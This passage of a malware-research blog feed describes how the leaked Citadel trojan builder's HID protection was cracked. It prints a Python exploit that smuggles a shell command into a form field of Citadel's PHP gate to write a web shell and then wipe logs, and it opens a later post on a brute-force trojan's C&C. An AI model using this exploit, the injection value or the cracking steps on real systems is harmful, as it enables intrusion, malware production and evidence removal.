The code is exactly the same as the one you can find on the Citadel Builder, it may help to locate the calculation procedure on the builder although it&#39;s really easy to locate it.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLq5wDgygxNmRaRAQxVXpXs7CLgx4GFqidjf75PrqHSHNsS9piij5okXt-9P-nCeq_1umb1OYt_JJz2lxTllQaq8g2eKKcPc_xyE4k0TeaO6XhHoeZYmjdl_xWPn3Gg4nbXMKWURf5BQ/s1600/29-12-2013+19-14-56.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;170&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLq5wDgygxNmRaRAQxVXpXs7CLgx4GFqidjf75PrqHSHNsS9piij5okXt-9P-nCeq_1umb1OYt_JJz2lxTllQaq8g2eKKcPc_xyE4k0TeaO6XhHoeZYmjdl_xWPn3Gg4nbXMKWURf5BQ/s400/29-12-2013+19-14-56.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
That was just a short parentheses, to get back on the builder, after that the generation end you will have multiple occasions to view your HID on the stack like here:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEZ8zRDcX1Kt-U-JsYXiek8KJxks8pco03dAoI1nOPtXzD7S_DaslF03xAyrf7PgA9DCqLIN9W5qxpTPt30FVlsV3L-ZK2_6BFfR9Pm-POQmo5Uqjl8bkDp9obu4jYlaDkBKJJG3_fEM/s1600/29-12-2013+19-24-34.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;78&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEZ8zRDcX1Kt-U-JsYXiek8KJxks8pco03dAoI1nOPtXzD7S_DaslF03xAyrf7PgA9DCqLIN9W5qxpTPt30FVlsV3L-ZK2_6BFfR9Pm-POQmo5Uqjl8bkDp9obu4jYlaDkBKJJG3_fEM/s400/29-12-2013+19-24-34.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
And the crutial part start here.&lt;br /&gt;
&lt;br /&gt;
When the Citadel package of Citab got leaked (&lt;a href=&quot;http://www.xylibox.com/2013/06/citadel-lawsuit-and-explanation-of-john.html&quot;&gt;see this article for more information&lt;/a&gt;) an important file was also released:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBzZyFLEOrjIBjMq25oknUevjMYYcG9r-3nc4sUOip-qztA8Ku4tFx3VPrn-0T6fY2PQSQaESAGpPX4bJISyOyBzfDN93McGJgZegY2WmhzUEvE1MRpwlk0DBTqgqcgcWZdcQe7jECsw/s1600/29-12-2013+19-32-23.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBzZyFLEOrjIBjMq25oknUevjMYYcG9r-3nc4sUOip-qztA8Ku4tFx3VPrn-0T6fY2PQSQaESAGpPX4bJISyOyBzfDN93McGJgZegY2WmhzUEvE1MRpwlk0DBTqgqcgcWZdcQe7jECsw/s1600/29-12-2013+19-32-23.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The HID of the original machine who was running the builder, so you just have to replace your HID by this one, just like this:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguJbG6EI788om3XsthnSs_VYt6UWgjSWCemTbQEZbvACufBM7LRvukR4OyRAWA7YV6VTW3khaH58m4DsvoiGB_qaQ91AjG-8vK6WI9zmgcQqjci8IN659HqJbb5c_gaH5uiAVd7laU2M0/s1600/29-12-2013+19-36-14.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;100&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguJbG6EI788om3XsthnSs_VYt6UWgjSWCemTbQEZbvACufBM7LRvukR4OyRAWA7YV6VTW3khaH58m4DsvoiGB_qaQ91AjG-8vK6WI9zmgcQqjci8IN659HqJbb5c_gaH5uiAVd7laU2M0/s400/29-12-2013+19-36-14.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
And this is how the protection of Citadel become super weak and can generate working malwares&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhqfUqBcjcri3Rfn-d14KhEBTXDxEmVJJgr9MJeozuiH8drPhWylBcmUo4On9Tgp77JmmLA77UUSvPWzeS7MUGIUajEceHOPVpJ6oKKuBLs_Mdt2Nc5BhxX-7PiomlB8rPVTzETodNLA/s1600/29-12-2013+19-38-04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;263&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhqfUqBcjcri3Rfn-d14KhEBTXDxEmVJJgr9MJeozuiH8drPhWylBcmUo4On9Tgp77JmmLA77UUSvPWzeS7MUGIUajEceHOPVpJ6oKKuBLs_Mdt2Nc5BhxX-7PiomlB8rPVTzETodNLA/s400/29-12-2013+19-38-04.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Now you just have to do a codecave or inject a dll in order to modify it permanently, child game.&lt;br /&gt;
&lt;br /&gt;
The problem that every crackers was facing on leaked Citadel builders is to find the good HID key.&lt;br /&gt;
Citadel builders who was previously leaked wasn&#39;t leaked with HID key. &lt;br /&gt;
e.g: vortex1772_second - 1.3.5.1&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_aTk7VW_-2JNZxtGzACl_FuvgiQ9_iMw7TZoQwlAlrPzmRU0kgezJ9tNr4ZMcnKbLMNwzVLEU6YoxxvqBdnCaElPN2SlheUHsn-sw7dWbf3q3d8j0zmd0MJV9wEG8OmX_xb8K-k3EBlg/s1600/dK6XvLF.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;306&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_aTk7VW_-2JNZxtGzACl_FuvgiQ9_iMw7TZoQwlAlrPzmRU0kgezJ9tNr4ZMcnKbLMNwzVLEU6YoxxvqBdnCaElPN2SlheUHsn-sw7dWbf3q3d8j0zmd0MJV9wEG8OmX_xb8K-k3EBlg/s400/dK6XvLF.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
And you can&#39;t just &#39;force&#39; the procedure to generate a bot because the Citadel stub is encrypted inside, that why when the package got leaked with the correct HID, a easy way to crack the builder appeared.&lt;br /&gt;
Without having the good HID you can still bruteforce it till you break the key but this is much harder and time wasting, this solution would be also a more great achievement and respected in scene release.&lt;br /&gt;
&lt;br /&gt;
To finish, let&#39;s get back on the Citadel backconnect server who was requested on kernelmode.info &lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhONOanrUhlqlSgTY3BUyk4BZso9xDagiCQ85eJOokRJVfuvzyzxeCg5cDqa3IH8qRand4hZ6B7NM1AZ0GRheResFu79KRKshm-Yic0X_Ye5A_byUozRk56QO9O6k8YleNBrUaSelhZKag/s1600/30-12-2013+01-47-30.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;197&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhONOanrUhlqlSgTY3BUyk4BZso9xDagiCQ85eJOokRJVfuvzyzxeCg5cDqa3IH8qRand4hZ6B7NM1AZ0GRheResFu79KRKshm-Yic0X_Ye5A_byUozRk56QO9O6k8YleNBrUaSelhZKag/s400/30-12-2013+01-47-30.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
This script was also leaked with the Citab package:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpcNtqT7SzYEKYsFT_Ph9qbsQRcW3Kfr4tH1roAXped2UNkkOgZ65BXN3mxhDJlzfsKC-ZytXpq5OgoLYn2go21iTFmi_u3rb_pElq-GGG4ciJ8eRcMzMyiTgVVHykAP3fyVmO-hiOeJE/s1600/30-12-2013+01-49-29.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;218&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpcNtqT7SzYEKYsFT_Ph9qbsQRcW3Kfr4tH1roAXped2UNkkOgZ65BXN3mxhDJlzfsKC-ZytXpq5OgoLYn2go21iTFmi_u3rb_pElq-GGG4ciJ8eRcMzMyiTgVVHykAP3fyVmO-hiOeJE/s400/30-12-2013+01-49-29.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7VtNgg_1cQaqaTyHKRMDUgzIq1-gEN38iHJEsYn4F68FkCMD5AAOcPNcSCwT3Qyfj3zFJhAQH1wKowbbKuiMsVoDGDsMvhJlKHh_FVwELJg2LNIgcTTXUqixZLqn5vcZ1oGft5dGQ9Ns/s1600/31-12-2013+14-08-54.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7VtNgg_1cQaqaTyHKRMDUgzIq1-gEN38iHJEsYn4F68FkCMD5AAOcPNcSCwT3Qyfj3zFJhAQH1wKowbbKuiMsVoDGDsMvhJlKHh_FVwELJg2LNIgcTTXUqixZLqn5vcZ1oGft5dGQ9Ns/s1600/31-12-2013+14-08-54.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
It&#39;s for Windows box, and it&#39;s super secure... oh wait..&lt;br /&gt;
&lt;div class=&quot;python&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;import&lt;/span&gt; &lt;span style=&quot;color: crimson;&quot;&gt;urllib&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;import&lt;/span&gt; &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;def&lt;/span&gt; request&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url, params=&lt;span style=&quot;color: green;&quot;&gt;None&lt;/span&gt;, method=&lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;GET&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;if&lt;/span&gt; method == &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;POST&#39;&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlopen&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url, &lt;span style=&quot;color: crimson;&quot;&gt;urllib&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlencode&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;params&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;read&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;elif&lt;/span&gt; method == &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;GET&#39;&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;if&lt;/span&gt; params == &lt;span style=&quot;color: green;&quot;&gt;None&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlopen&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: crimson;&quot;&gt;urllib2&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlopen&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url + &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;?&#39;&lt;/span&gt; + &lt;span style=&quot;color: crimson;&quot;&gt;urllib&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlencode&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;params&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;read&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;def&lt;/span&gt; uploadShell&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url, filename, payload&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; data = &lt;span style=&quot;color: black;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;b&#39;&lt;/span&gt; &amp;nbsp;: &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;tapz&#39;&lt;/span&gt;,&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;p1&#39;&lt;/span&gt; : &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;faggot&#39;&lt;/span&gt;,&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;p2&#39;&lt;/span&gt; : &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;hacker | echo &quot;&#39;&lt;/span&gt; + payload + &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;&quot; &amp;gt;&amp;gt; &#39;&lt;/span&gt; + filename&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: black;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; request&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url + &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;test.php&#39;&lt;/span&gt;, data&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;def&lt;/span&gt; shellExists&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;return&lt;/span&gt; &lt;span style=&quot;color: crimson;&quot;&gt;urllib&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;urlopen&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;.&lt;span style=&quot;color: black;&quot;&gt;getcode&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt; == &lt;span style=&quot;color: orangered;&quot;&gt;200&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;def&lt;/span&gt; cleanLogs&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;url&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; delete = &lt;span style=&quot;color: black;&quot;&gt;{&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;delete&#39;&lt;/span&gt; : &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;&#39;&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: black;&quot;&gt;}&lt;/span&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp; request&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;URL + &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;control.php&#39;&lt;/span&gt;, delete, &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;POST&#39;&lt;/span&gt;&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
URL &amp;nbsp; &amp;nbsp; &amp;nbsp;= &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;http://localhost/citadel/winserv_php_gate/&#39;&lt;/span&gt;&lt;br /&gt;
FILENAME = &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;shell.php&#39;&lt;/span&gt;&lt;br /&gt;
PAYLOAD &amp;nbsp;= &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;&amp;lt;?php phpinfo(); ?&amp;gt;&#39;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
uploadShell&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;URL, FILENAME, PAYLOAD&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;print&lt;/span&gt; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;[~] Shell created!&#39;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;if&lt;/span&gt; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;not&lt;/span&gt; shellExists&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;URL + FILENAME&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;print&lt;/span&gt; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;[-]&#39;&lt;/span&gt;, FILENAME, &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;not found...&#39;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;else&lt;/span&gt;:&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;print&lt;/span&gt; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;[+] Go to:&#39;&lt;/span&gt;, URL + FILENAME&lt;br /&gt;
cleanLogs&lt;span style=&quot;color: black;&quot;&gt;(&lt;/span&gt;URL&lt;span style=&quot;color: black;&quot;&gt;)&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;color: #ff7700; font-weight: bold;&quot;&gt;print&lt;/span&gt; &lt;span style=&quot;color: darkslateblue;&quot;&gt;&#39;[~] Logs cleaned!&#39;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
Brief, happy new year guys :)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4SnfOeR5GJCK-Bio042L1N_UC1DUlvfzi7pgPD5FqIO_WaKIFSivendBhNvQmWgrwK9pXDVvZmadu4fKiGQd4O7t31Ieu4GoG9whSAmS_NPt2PhX78Rz_tZCsdWji4wiK8FUl7PSEjK0/s1600/design_temari_by_e_nat-d3cmyj3.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;276&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh4SnfOeR5GJCK-Bio042L1N_UC1DUlvfzi7pgPD5FqIO_WaKIFSivendBhNvQmWgrwK9pXDVvZmadu4fKiGQd4O7t31Ieu4GoG9whSAmS_NPt2PhX78Rz_tZCsdWji4wiK8FUl7PSEjK0/s400/design_temari_by_e_nat-d3cmyj3.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
</description><link>https://www.xylibox.com/2013/12/how-protection-of-citadel-got-cracked.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyYb2AuY7UJRqX5XJ7vzyJ-unafw2IhZUx3TIBKqAaCqctzWCS22mggcaB_DLCssPWnhXIiuatBZq6gyiYVScMkS9krtoG0byang2YSSLtVFauWcgJ1y64l8B7RUCuY9fXYwXbCUoNbGg/s72-c/29-12-2013+17-51-47.png" height="72" width="72"/><thr:total>17</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-8184390894600470352</guid><pubDate>Fri, 20 Dec 2013 20:44:00 +0000</pubDate><atom:updated>2013-12-20T21:44:48.843+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">BruteForce.WP</category><category domain="http://www.blogger.com/atom/ns#">NETSKY Project</category><category domain="http://www.blogger.com/atom/ns#">SIB Service</category><category domain="http://www.blogger.com/atom/ns#">Trojan.WPCracker.1</category><category domain="http://www.blogger.com/atom/ns#">WPCracker.1</category><title>  Win32/BruteForce.WP</title><description>DrWeb released a &lt;a href=&quot;http://translate.google.com/translate?sl=ru&amp;amp;tl=en&amp;amp;u=http://news.drweb.com/?i=3811&quot;&gt;news&lt;/a&gt; about this malware in August, they know it as &#39;Trojan.WPCracker.1&#39;&lt;br /&gt;
And more recently ~ &lt;a href=&quot;https://www.virustotal.com/en/file/a821b1c35c9c290b1759d6e8151bf95efdd13168146887f840d3d3f11d94411b/analysis/1386340092/&quot;&gt;1e8cd0f0f1702820c870302520bc0176&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
This executable communicate with a C&amp;amp;C at dorblu99.net&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhba5AHWCiGu093SXDO_TV8hw0FYYJkFfJONM-_oSZ0Yzdt6rtcUYef_fi-nwFcPKfCZdtWZrovMKWTSr_c56p_0nSP1vu55R-aPUjS8eofwT3w_VYV2LIvp7EAESJmYGYrZf8Dd_E_nO4/s1600/06-12-2013+15-33-39.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;233&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhba5AHWCiGu093SXDO_TV8hw0FYYJkFfJONM-_oSZ0Yzdt6rtcUYef_fi-nwFcPKfCZdtWZrovMKWTSr_c56p_0nSP1vu55R-aPUjS8eofwT3w_VYV2LIvp7EAESJmYGYrZf8Dd_E_nO4/s400/06-12-2013+15-33-39.png&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Let&#39;s have a closer look.&lt;br /&gt;
&lt;br /&gt;
Login:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJnB0Xqw7pPO-LRnfGxA2Ahe1WCWkFld1iS4HsyKOj_WWWNqQ2ou-j7JQ6sZJEZ-fFtCwVAq4qzVWLnXKeurvtyv1EXwXggxoAkM_5Kx2aUecyyTsnaYJQJjiE-Xms067mrxjZDiVPSk/s1600/29-11-2013+10-20-43.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPJnB0Xqw7pPO-LRnfGxA2Ahe1WCWkFld1iS4HsyKOj_WWWNqQ2ou-j7JQ6sZJEZ-fFtCwVAq4qzVWLnXKeurvtyv1EXwXggxoAkM_5Kx2aUecyyTsnaYJQJjiE-Xms067mrxjZDiVPSk/s1600/29-11-2013+10-20-43.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Main:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEdzFDmgzoz8pzbFPSTtGDNqHh82WE0mfKqEqKmJCbjF0Fy_JN8GqpVSSs4sZ8GmYIHgXNWlM3pudxaJbmzORhIxYx36YVG4y3s5J2SnhM6Yi52WWCFgsd4MRoiF_krLbG0Iav7ipCU/s1600/29-11-2013+10-23-31.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;400&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_lEdzFDmgzoz8pzbFPSTtGDNqHh82WE0mfKqEqKmJCbjF0Fy_JN8GqpVSSs4sZ8GmYIHgXNWlM3pudxaJbmzORhIxYx36YVG4y3s5J2SnhM6Yi52WWCFgsd4MRoiF_krLbG0Iav7ipCU/s400/29-11-2013+10-23-31.png&quot; width=&quot;317&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Bot info:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
